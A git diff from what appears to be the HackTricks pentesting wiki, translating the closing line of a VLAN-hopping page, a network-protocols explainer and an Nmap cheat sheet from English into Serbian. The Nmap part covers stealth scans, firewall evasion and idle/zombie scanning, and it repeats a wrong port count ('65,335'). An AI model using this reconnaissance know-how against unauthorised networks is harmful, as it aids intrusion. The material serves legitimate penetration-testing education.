-Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.
+Na kraju, ovaj proces omogućava zaobilaženje VLAN segmentacije, čime se olakšava neograničen pristup bilo kojoj VLAN mreži i postavlja osnova za naredne akcije.
 
 ## References
 
diff --git a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md
index 72dfbfb12..3c73fc892 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md
@@ -2,54 +2,54 @@
 
 ## Multicast DNS (mDNS)
 
-The **mDNS** protocol is designed for IP address resolution within small, local networks without a dedicated name server. It operates by multicasting a query within the subnet, prompting the host with the specified name to respond with its IP address. All devices in the subnet can then update their mDNS caches with this information.
+Protokol **mDNS** je dizajniran za rešavanje IP adresa unutar malih, lokalnih mreža bez posvećenog servera imena. Funkcioniše tako što multicast-uje upit unutar podmreže, podstičući host sa specificiranim imenom da odgovori sa svojom IP adresom. Svi uređaji u podmreži mogu zatim ažurirati svoje mDNS kešove sa ovom informacijom.
 
-Key points to note:
+Ključne tačke koje treba napomenuti:
 
-- **Domain Name Relinquishment**: A host can release its domain name by sending a packet with a TTL of zero.
-- **Usage Restriction**: mDNS typically resolves names ending in **.local** only. Conflicts with non-mDNS hosts in this domain require network configuration adjustments.
-- **Networking Details**:
-  - Ethernet multicast MAC addresses: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`.
-  - IP addresses: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`.
-  - Operates over UDP port 5353.
-  - mDNS queries are confined to the local network and do not cross routers.
+- **Odricanje od imena domena**: Host može osloboditi svoje ime domena slanjem paketa sa TTL-om nula.
+- **Ograničenje korišćenja**: mDNS obično rešava imena koja se završavaju sa **.local**. Sukobi sa non-mDNS hostovima u ovoj domeni zahtevaju prilagođavanje mrežne konfiguracije.
+- **Detalji mreže**:
+- Ethernet multicast MAC adrese: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`.
+- IP adrese: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`.
+- Radi preko UDP porta 5353.
+- mDNS upiti su ograničeni na lokalnu mrežu i ne prelaze rutere.
 
 ## DNS-SD (Service Discovery)
 
-DNS-SD is a protocol for discovering services on a network by querying specific domain names (e.g., `_printers._tcp.local`). A response includes all related domains, such as available printers in this case. A comprehensive list of service types can be found [here](http://www.dns-sd.org/ServiceTypes.html).
+DNS-SD je protokol za otkrivanje usluga na mreži putem upita specifičnih imena domena (npr., `_printers._tcp.local`). Odgovor uključuje sve povezane domene, kao što su dostupni štampači u ovom slučaju. Sveobuhvatna lista tipova usluga može se naći [ovde](http://www.dns-sd.org/ServiceTypes.html).
 
 ## SSDP (Simple Service Discovery Protocol)
 
-SSDP facilitates the discovery of network services and is primarily utilized by UPnP. It's a text-based protocol using UDP over port 1900, with multicast addressing. For IPv4, the designated multicast address is `239.255.255.250`. SSDP's foundation is [HTTPU](https://en.wikipedia.org/wiki/HTTPU), an extension of HTTP for UDP.
+SSDP olakšava otkrivanje mrežnih usluga i prvenstveno se koristi od strane UPnP. To je tekstualni protokol koji koristi UDP preko porta 1900, sa multicast adresiranjem. Za IPv4, određena multicast adresa je `239.255.255.250`. Osnova SSDP-a je [HTTPU](https://en.wikipedia.org/wiki/HTTPU), ekstenzija HTTP-a za UDP.
 
 ## Web Service for Devices (WSD)
 
-Devices connected to a network can identify available services, like printers, through the Web Service for Devices (WSD). This involves broadcasting UDP packets. Devices seeking services send requests, while service providers announce their offerings.
+Uređaji povezani na mrežu mogu identifikovati dostupne usluge, poput štampača, putem Web Service for Devices (WSD). Ovo uključuje emitovanje UDP paketa. Uređaji koji traže usluge šalju zahteve, dok provajderi usluga najavljuju svoje ponude.
 
 ## OAuth 2.0
 
-OAuth 2.0 is a protocol facilitating secure, selective sharing of user information between services. For instance, it enables services to access user data from Google without multiple logins. The process involves user authentication, authorization by the user, and token generation by Google, allowing service access to the specified user data.
+OAuth 2.0 je protokol koji olakšava sigurno, selektivno deljenje korisničkih informacija između usluga. Na primer, omogućava uslugama pristup korisničkim podacima sa Google-a bez višestrukih prijava. Proces uključuje autentifikaciju korisnika, autorizaciju od strane korisnika i generisanje tokena od strane Google-a, omogućavajući uslugama pristup specificiranim korisničkim podacima.
 
 ## RADIUS
 
-RADIUS (Remote Authentication Dial-In User Service) is a network access protocol primarily used by ISPs. It supports authentication, authorization, and accounting. User credentials are verified by a RADIUS server, potentially including network address verification for added security. Post-authentication, users receive network access and their session details are tracked for billing and statistical purposes.
+RADIUS (Remote Authentication Dial-In User Service) je protokol za pristup mreži koji se prvenstveno koristi od strane ISP-ova. Podržava autentifikaciju, autorizaciju i obračun. Korisnički podaci se verifikuju od strane RADIUS servera, potencijalno uključujući verifikaciju mrežne adrese za dodatnu sigurnost. Nakon autentifikacije, korisnici dobijaju pristup mreži, a detalji njihove sesije se prate za obračun i statističke svrhe.
 
 ## SMB and NetBIOS
 
 ### SMB (Server Message Block)
 
-SMB is a protocol for sharing files, printers, and ports. It operates directly over TCP (port 445) or via NetBIOS over TCP (ports 137, 138). This dual compatibility enhances connectivity with various devices.
+SMB je protokol za deljenje fajlova, štampača i portova. Radi direktno preko TCP (porta 445) ili putem NetBIOS-a preko TCP (portovi 137, 138). Ova dualna kompatibilnost poboljšava povezanost sa raznim uređajima.
 
 ### NetBIOS (Network Basic Input/Output System)
 
-NetBIOS manages network sessions and connections for resource sharing. It supports unique names for devices and group names for multiple devices, enabling targeted or broadcast messaging. Communication can be connectionless (no acknowledgment) or connection-oriented (session-based). While NetBIOS traditionally operates over protocols like IPC/IPX, it's commonly used over TCP/IP. NetBEUI, an associated protocol, is known for its speed but was also quite verbose due to broadcasting.
+NetBIOS upravlja mrežnim sesijama i vezama za deljenje resursa. Podržava jedinstvena imena za uređaje i grupna imena za više uređaja, omogućavajući ciljanje ili emitovanje poruka. Komunikacija može biti bez veze (bez potvrde) ili orijentisana na vezu (na bazi sesije). Dok NetBIOS tradicionalno funkcioniše preko protokola kao što su IPC/IPX, često se koristi preko TCP/IP. NetBEUI, povezan protokol, poznat je po svojoj brzini, ali je takođe bio prilično opširan zbog emitovanja.
 
 ## LDAP (Lightweight Directory Access Protocol)
 
-LDAP is a protocol enabling the management and access of directory information over TCP/IP. It supports various operations for querying and modifying directory information. Predominantly, it's utilized for accessing and maintaining distributed directory information services, allowing interaction with databases designed for LDAP communication.
+LDAP je protokol koji omogućava upravljanje i pristup informacijama o direktorijumu preko TCP/IP. Podržava razne operacije za upit i modifikaciju informacija o direktorijumu. Pretežno se koristi za pristup i održavanje distribuiranih usluga informacija o direktorijumu, omogućavajući interakciju sa bazama podataka dizajniranim za LDAP komunikaciju.
 
 ## Active Directory (AD)
 
-Active Directory is a network-accessible database containing objects like users, groups, privileges, and resources, facilitating centralized management of network entities. AD organizes its data into a hierarchical structure of domains, which can encompass servers, groups, and users. Subdomains allow further segmentation, each potentially maintaining its own server and user base. This structure centralizes user management, granting or restricting access to network resources. Queries can be made to retrieve specific information, like contact details, or to locate resources, like printers, within the domain.
+Active Directory je mrežno dostupna baza podataka koja sadrži objekte kao što su korisnici, grupe, privilegije i resursi, olakšavajući centralizovano upravljanje mrežnim entitetima. AD organizuje svoje podatke u hijerarhijsku strukturu domena, koja može obuhvatati servere, grupe i korisnike. Poddomeni omogućavaju dalju segmentaciju, pri čemu svaki može održavati svoj vlastiti server i korisničku bazu. Ova struktura centralizuje upravljanje korisnicima, dodeljujući ili ograničavajući pristup mrežnim resursima. Upiti se mogu vršiti za preuzimanje specifičnih informacija, kao što su kontakt detalji, ili za lociranje resursa, kao što su štampači, unutar domena.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
index 02535d28b..a57e293d1 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
@@ -1,96 +1,90 @@
-# Nmap Summary (ESP)
+# Nmap Sažetak (ESP)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-

-
-{% embed url="https://websec.nl/" %}
-
 ```
 nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
 ```
+## Parametri
 
-## Parameters
+### IP adrese za skeniranje
 
-### IPs to scan
-
-- **`,`:** Indicate the ips directly
+- **`,`:** Indikujte IP adrese direktno
 - **`-iL `:** list_IPs
-- **`-iR `**: Number of random Ips, you can exclude possible Ips with `--exclude ` or `--excludefile `.
+- **`-iR `**: Broj nasumičnih IP adresa, možete isključiti moguće IP adrese sa `--exclude ` ili `--excludefile `.
 
-### Equipment discovery
+### Otkriće opreme
 
-By default Nmap launches a discovery phase consisting of: `-PA80 -PS443 -PE -PP`
+Podrazumevano, Nmap pokreće fazu otkrivanja koja se sastoji od: `-PA80 -PS443 -PE -PP`
 
-- **`-sL`**: It is not invasive, it lists the targets making **DNS** requests to resolve names. It is useful to know if for example www.prueba.es/24 all Ips are our targets.
-- **`-Pn`**: **No ping**. This is useful if you know that all of them are active (if not, you could lose a lot of time, but this option also produces false negatives saying that they are not active), it prevents the discovery phase.
-- **`-sn`** : **No port scan**. After completing the reconnaissance phase, it does not scan ports. It is relatively stealthy, and allows a small network scan. With privileges it sends an ACK (-PA) to 80, a SYN(-PS) to 443 and an echo request and a Timestamp request, without privileges it always completes connections. If the target is the network, it only uses ARP(-PR). If used with another option, only the packets of the other option are dropped.
-- **`-PR`**: **Ping ARP**. It is used by default when analyzing computers in our network, it is faster than using pings. If you do not want to use ARP packets use `--send-ip`.
-- **`-PS `**: It sends SYN packets to which if it answers SYN/ACK it is open (to which it answers with RST so as not to end the connection), if it answers RST it is closed and if it does not answer it is unreachable. In case of not having privileges, a total connection is automatically used. If no ports are given, it throws it to 80.
-- **`-PA `**: Like the previous one but with ACK, combining both of them gives better results.
-- **`-PU `**: The objective is the opposite, they are sent to ports that are expected to be closed. Some firewalls only check TCP connections. If it is closed it is answered with port unreachable, if it is answered with another icmp or not answered it is left as destination unreachable.
-- **`-PE, -PP, -PM`** : ICMP PINGS: echo replay, timestamp and addresmask. They are launched to find out if the target is active.
-- **`-PY`**: Sends SCTP INIT probes to 80 by default, INIT-ACK(open) or ABORT(closed) or nothing or ICMP unreachable(inactive) can be replied.
-- **`-PO `**: A protocol is indicated in the headers, by default 1(ICMP), 2(IGMP) and 4(Encap IP). For ICMP, IGMP, TCP (6) and UDP (17) protocols the protocol headers are sent, for the rest only the IP header is sent. The purpose of this is that due to the malformation of the headers, Protocol unreachable or responses of the same protocol are answered to know if it is up.
-- **`-n`**: No DNS
-- **`-R`**: DNS always
+- **`-sL`**: Nije invazivan, navodi ciljeve praveći **DNS** zahteve za razrešavanje imena. Korisno je znati da li su, na primer, www.prueba.es/24 sve IP adrese naši ciljevi.
+- **`-Pn`**: **Bez pinga**. Ovo je korisno ako znate da su svi aktivni (ako ne, mogli biste izgubiti mnogo vremena, ali ova opcija takođe proizvodi lažne negativne rezultate govoreći da nisu aktivni), sprečava fazu otkrivanja.
+- **`-sn`** : **Bez skeniranja portova**. Nakon završetka faze izviđanja, ne skenira portove. Relativno je neprimetan i omogućava malo skeniranje mreže. Sa privilegijama šalje ACK (-PA) na 80, SYN(-PS) na 443 i echo zahtev i zahtev za vremenskom oznakom, bez privilegija uvek završava veze. Ako je cilj mreža, koristi samo ARP(-PR). Ako se koristi sa drugom opcijom, samo se paketi druge opcije odbacuju.
+- **`-PR`**: **Ping ARP**. Koristi se podrazumevano prilikom analize računara u našoj mreži, brži je od korišćenja pinga. Ako ne želite da koristite ARP pakete, koristite `--send-ip`.
+- **`-PS `**: Šalje SYN pakete na koje, ako odgovori SYN/ACK, port je otvoren (na koji odgovara sa RST kako ne bi završio vezu), ako odgovori RST, port je zatvoren, a ako ne odgovori, port je nedostupan. U slučaju da nemate privilegije, automatski se koristi potpuna veza. Ako nisu dati portovi, šalje se na 80.
+- **`-PA `**: Kao prethodni, ali sa ACK, kombinovanjem oboje daje bolje rezultate.
+- **`-PU `**: Cilj je suprotan, šalju se na portove za koje se očekuje da su zatvoreni. Neki vatrozidi proveravaju samo TCP veze. Ako je zatvoren, odgovara se sa port nedostupan, ako se odgovara sa drugim icmp ili ne odgovara, ostavlja se kao odredište nedostupno.
+- **`-PE, -PP, -PM`** : ICMP PINGS: echo replay, vremenska oznaka i maska adrese. Pokreću se da bi se saznalo da li je cilj aktivan.
+- **`-PY`**: Šalje SCTP INIT probe na 80 podrazumevano, INIT-ACK (otvoren) ili ABORT (zatvoren) ili ništa ili ICMP nedostupan (neaktivan) može biti odgovoreno.
+- **`-PO `**: Protokol se označava u zaglavljima, podrazumevano 1 (ICMP), 2 (IGMP) i 4 (Encap IP). Za ICMP, IGMP, TCP (6) i UDP (17) protokole šalju se zaglavlja protokola, za ostale se šalje samo IP zaglavlje. Svrha ovoga je da zbog deformacije zaglavlja, odgovori na Protokol nedostupan ili odgovori istog protokola se šalju da bi se znalo da li je aktivan.
+- **`-n`**: Bez DNS
+- **`-R`**: DNS uvek
 
-### Port scanning techniques
+### Tehnike skeniranja portova
 
-- **`-sS`**: Does not complete the connection so it leaves no trace, very good if it can be used.(privileges) It is the one used by default.
-- **`-sT`**: Completes the connection, so it does leave a trace, but it can be used for sure. By default without privileges.
-- **`-sU`**: Slower, for UDP. Mostly: DNS(53), SNMP(161,162), DHCP(67 and 68), (-sU53,161,162,67,68): open(reply), closed(port unreachable), filtered (another ICMP), open/filtered (nothing). In case of open/filtered, -sV sends numerous requests to detect any of the versions that nmap supports and can detect the true state. It increases a lot the time.
-- **`-sY`**: SCTP protocol fails to establish the connection, so there are no logs, works like -PY
-- **`-sN,-sX,-sF`:** Null, Fin, Xmas, they can penetrate some firewalls and extract information. They are based on the fact that standard compliant machines should respond with RST all requests that do not have SYN, RST or ACK lags raised: open/filtered(nothing), closed(RST), filtered (ICMP unreachable). Unreliable on WIndows, CIsco, BSDI and OS/400. On unix yes.
-- **`-sM`**: Maimon scan: Sends FIN and ACK flags, used for BSD, currently will return all as closed.
-- **`-sA, sW`**: ACK and Window, is used to detect firewalls, to know if the ports are filtered or not. The -sW does distinguish between open/closed since the open ones respond with a different window value: open (RST with window other than 0), closed (RST window = 0), filtered (ICMP unreachable or nothing). Not all computers work this way, so if it is all closed, it is not working, if it is a few open, it is working fine, and if it is many open and few closed, it is working the other way around.
-- **`-sI`:** Idle scan. For the cases in which there is an active firewall but we know that it does not filter to a certain Ip (or when we simply want anonymity) we can use the zombie scanner (it works for all the ports), to look for possible zombies we can use the scrpit ipidseq or the exploit auxiliary/scanner/ip/ipidseq. This scanner is based on the IPID number of the IP packets.
-- **`--badsum`:** It sends the sum wrong, the computers would discard the packets, but the firewalls could answer something, it is used to detect firewalls.
-- **`-sZ`:** "Weird" SCTP scanner, when sending probes with cookie echo fragments they should be dropped if open or responded with ABORT if closed. It can pass through firewalls that init does not pass through, the bad thing is that it does not distinguish between filtered and open.
-- **`-sO`:** Protocol Ip scan. Sends bad and empty headers in which sometimes not even the protocol can be distinguished. If ICMP unreachable protocol arrives it is closed, if unreachable port arrives it is open, if another error arrives, filtered, if nothing arrives, open|filtered.
-- **`-b `:** FTPhost--> It is used to scan a host from another one, this is done by connecting the ftp of another machine and asking it to send files to the ports that you want to scan from another machine, according to the answers we will know if they are open or not. \[\:\@]\\[:\] Almost all ftps servers no longer let you do this and therefore it is of little practical use.
+- **`-sS`**: Ne završava vezu, tako da ne ostavlja trag, veoma dobro ako se može koristiti. (privilegije) To je ono što se koristi podrazumevano.
+- **`-sT`**: Završava vezu, tako da ostavlja trag, ali se može sigurno koristiti. Podrazumevano bez privilegija.
+- **`-sU`**: Sporije, za UDP. Uglavnom: DNS(53), SNMP(161,162), DHCP(67 i 68), (-sU53,161,162,67,68): otvoren (odgovor), zatvoren (port nedostupan), filtriran (drugi ICMP), otvoren/filtriran (ništa). U slučaju otvorenog/filtriranog, -sV šalje brojne zahteve da otkrije bilo koju od verzija koje nmap podržava i može otkriti stvarno stanje. Povećava vreme skeniranja.
+- **`-sY`**: SCTP protokol ne uspeva da uspostavi vezu, tako da nema logova, radi kao -PY
+- **`-sN,-sX,-sF`:** Null, Fin, Xmas, mogu proći kroz neke vatrozide i izvući informacije. Zasnovani su na činjenici da standardne mašine treba da odgovore sa RST na sve zahteve koji nemaju SYN, RST ili ACK kašnjenja: otvoren/filtriran (ništa), zatvoren (RST), filtriran (ICMP nedostupan). Nepouzdano na Windows, Cisco, BSDI i OS/400. Na unixu da.
+- **`-sM`**: Maimon skeniranje: Šalje FIN i ACK zastavice, koristi se za BSD, trenutno će sve vratiti kao zatvoreno.
+- **`-sA, sW`**: ACK i Window, koristi se za otkrivanje vatrozida, da bi se znalo da li su portovi filtrirani ili ne. -sW razlikuje između otvorenog/zatvorenog, pošto otvoreni odgovaraju sa različitom vrednošću prozora: otvoren (RST sa prozorom različitim od 0), zatvoren (RST prozor = 0), filtriran (ICMP nedostupan ili ništa). Ne rade sve mašine na ovaj način, tako da ako je sve zatvoreno, ne radi, ako je nekoliko otvorenih, radi dobro, a ako je mnogo otvorenih i malo zatvorenih, radi obrnuto.
+- **`-sI`:** Idle skeniranje. U slučajevima kada postoji aktivni vatrozid, ali znamo da ne filtrira za određeni IP (ili kada jednostavno želimo anonimnost) možemo koristiti zombie skener (radi za sve portove), da bismo tražili moguće zombije možemo koristiti skriptu ipidseq ili exploit auxiliary/scanner/ip/ipidseq. Ovaj skener se zasniva na IPID broju IP paketa.
+- **`--badsum`:** Šalje pogrešnu sumu, računari bi odbacili pakete, ali vatrozidi bi mogli odgovoriti na nešto, koristi se za otkrivanje vatrozida.
+- **`-sZ`:** "Čudan" SCTP skener, kada šalje probe sa fragmentima cookie echo, trebali bi biti odbijeni ako su otvoreni ili odgovoreni sa ABORT ako su zatvoreni. Može proći kroz vatrozide koje init ne može, loša stvar je što ne razlikuje između filtriranih i otvorenih.
+- **`-sO`:** Protokol IP skeniranje. Šalje loša i prazna zaglavlja u kojima ponekad ni protokol ne može biti razlikovan. Ako stigne ICMP nedostupan protokol, zatvoren je, ako stigne nedostupan port, otvoren je, ako stigne druga greška, filtriran je, ako ništa ne stigne, otvoren|filtriran.
+- **`-b `:** FTPhost--> Koristi se za skeniranje hosta sa drugog, ovo se radi povezivanjem na ftp druge mašine i traženjem da pošalje datoteke na portove koje želite da skenirate sa druge mašine, prema odgovorima ćemo znati da li su otvoreni ili ne. \[\:\@]\\[:\] Gotovo svi ftps serveri više ne dozvoljavaju ovo i stoga je malo praktične upotrebe.
 
-### **Focus Analysis**
+### **Analiza fokusa**
 
-**-p:** Used to specify ports to scan. To select all 65,335 ports: **-p-** or **-p all**. Nmap has an internal classification based on popularity. By default, it uses the top 1000 ports. With **-F** (fast scan) it analyzes the top 100. With **--top-ports ** it analyzes that number of top ports (from 1 to 65,335). It checks ports in random order; to prevent this, use **-r**. We can also select specific ports: 20-30,80,443,1024- (the latter means to look from 1024 onwards). We can also group ports by protocols: U:53,T:21-25,80,139,S:9. We can also choose a range within Nmap's popular ports: -p [-1024] analyzes up to port 1024 from those included in nmap-services. **--port-ratio ** Analyzes the most common ports within a ratio between 0 and 1
+**-p:** Koristi se za određivanje portova za skeniranje. Da biste odabrali svih 65,335 portova: **-p-** ili **-p all**. Nmap ima internu klasifikaciju zasnovanu na popularnosti. Podrazumevano koristi 1000 najpopularnijih portova. Sa **-F** (brzo skeniranje) analizira 100 najpopularnijih. Sa **--top-ports ** analizira taj broj najpopularnijih portova (od 1 do 65,335). Proverava portove nasumičnim redosledom; da biste to sprečili, koristite **-r**. Takođe možemo odabrati specifične portove: 20-30,80,443,1024- (potonje znači da tražimo od 1024 nadalje). Takođe možemo grupisati portove po protokolima: U:53,T:21-25,80,139,S:9. Takođe možemo odabrati opseg unutar popularnih portova Nmap-a: -p [-1024] analizira do porta 1024 iz onih uključenih u nmap-services. **--port-ratio ** Analizira najčešće portove unutar odnosa između 0 i 1
 
-**-sV** Version scanning, intensity can be regulated from 0 to 9, default is 7.
+**-sV** Skeniranje verzija, intenzitet se može regulisati od 0 do 9, podrazumevano je 7.
 
-**--version-intensity ** We regulate the intensity, so that the lower it is, it will only launch the most probable probes, but not all. With this, we can considerably shorten UDP scanning time
+**--version-intensity ** Reguliramo intenzitet, tako da što je niži, samo će pokrenuti najverovatnije probe, ali ne sve. Ovime možemo značajno skratiti vreme skeniranja UDP-a
 
-**-O** OS detection
+**-O** Otkrivanje operativnog sistema
 
-**--osscan-limit** For proper host scanning, at least one open port and one closed port are needed. If this condition isn't met and we've set this, it won't attempt OS prediction (saves time)
+**--osscan-limit** Za pravilno skeniranje hosta, potrebna su najmanje jedan otvoren port i jedan zatvoren port. Ako ova uslov nije ispunjen i postavili smo ovo, neće pokušati predikciju OS-a (štedi vreme)
 
-**--osscan-guess** When OS detection isn't perfect, this makes it try harder
+**--osscan-guess** Kada otkrivanje OS-a nije savršeno, ovo ga tera da se više potrudi
 
-**Scripts**
+**Skripte**
 
 --script __|__|__|__[,...]
 
-To use default scripts, use -sC or --script=default
+Da biste koristili podrazumevane skripte, koristite -sC ili --script=default
 
-Available types are: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln
+Dostupne vrste su: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, i vuln
 
-- **Auth:** executes all available authentication scripts
-- **Default:** executes basic default tool scripts
-- **Discovery:** retrieves information from the target or victim
-- **External:** script for using external resources
-- **Intrusive:** uses scripts considered intrusive to the victim or target
-- **Malware:** checks for connections opened by malicious code or backdoors
-- **Safe:** executes non-intrusive scripts
-- **Vuln:** discovers the most known vulnerabilities
-- **All:** executes absolutely all available NSE extension scripts
+- **Auth:** izvršava sve dostupne skripte za autentifikaciju
+- **Default:** izvršava osnovne podrazumevane skripte alata
+- **Discovery:** preuzima informacije sa cilja ili žrtve
+- **External:** skripta za korišćenje spoljašnjih resursa
+- **Intrusive:** koristi skripte koje se smatraju invazivnim za žrtvu ili cilj
+- **Malware:** proverava veze otvorene od strane zlonamernog koda ili backdoor-a
+- **Safe:** izvršava neinvazivne skripte
+- **Vuln:** otkriva najpoznatije ranjivosti
+- **All:** izvršava apsolutno sve dostupne NSE ekstenzijske skripte
 
-To search for scripts:
+Da biste pretražili skripte:
 
-**nmap --script-help="http-\*" -> Those starting with http-**
+**nmap --script-help="http-\*" -> One koje počinju sa http-**
 
-**nmap --script-help="not intrusive" -> All except those**
+**nmap --script-help="not intrusive" -> Sve osim onih**
 
-**nmap --script-help="default or safe" -> Those in either or both**
+**nmap --script-help="default or safe" -> One u bilo kojoj ili obe**
 
-**nmap --script-help="default and safe" --> Those in both**
+**nmap --script-help="default and safe" --> One u obe**
 
 **nmap --script-help="(default or safe or intrusive) and not http-\*"**
 
@@ -100,135 +94,135 @@ To search for scripts:
 
 --script-help __|__|__|__|all[,...]
 
---script-trace ---> Provides info on how the script is progressing
+--script-trace ---> Pruža informacije o tome kako skripta napreduje
 
 --script-updatedb
 
-**To use a script, just type: nmap --script Script_Name target** --> When using the script, both the script and scanner will execute, so scanner options can also be added. We can add **"safe=1"** to execute only safe ones.
+**Da biste koristili skriptu, jednostavno otkucajte: nmap --script Script_Name target** --> Kada koristite skriptu, i skripta i skener će se izvršiti, tako da se opcije skenera takođe mogu dodati. Možemo dodati **"safe=1"** da bismo izvršili samo sigurne.
 
-**Time Control**
+**Kontrola vremena**
 
-**Nmap can modify time in seconds, minutes, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing.
+**Nmap može modifikovati vreme u sekundama, minutima, ms:** --host-timeout argumenti 900000ms, 900, 900s, i 15m svi rade isto.
 
-Nmap divides the total number of hosts to scan into groups and analyzes these groups in blocks, so it doesn't move to the next block until all have been analyzed (and the user doesn't receive any updates until the block has been analyzed). This way, it's more optimal for Nmap to use large groups. By default in class C, it uses 256.
+Nmap deli ukupan broj hostova za skeniranje u grupe i analizira te grupe u blokovima, tako da ne prelazi na sledeći blok dok svi nisu analizirani (i korisnik ne prima nikakve ažuriranja dok blok nije analiziran). Na ovaj način, Nmap je optimalniji kada koristi velike grupe. Podrazumevano u klasi C, koristi 256.
 
-This can be changed with **--min-hostgroup** _****_**;** **--max-hostgroup** _****_ (Adjust parallel scan group sizes)
+Ovo se može promeniti sa **--min-hostgroup** _****_**;** **--max-hostgroup** _****_ (Prilagodite veličine paralelnih skeniranja)
 
-You can control the number of parallel scanners but it's better not to (Nmap already incorporates automatic control based on network status): **--min-parallelism** _****_**;** **--max-parallelism** _****_
+Možete kontrolisati broj paralelnih skenera, ali je bolje ne (Nmap već uključuje automatsku kontrolu zasnovanu na statusu mreže): **--min-parallelism** _****_**;** **--max-parallelism** _****_
 
-We can modify the RTT timeout, but it's usually not necessary: **--min-rtt-timeout** _**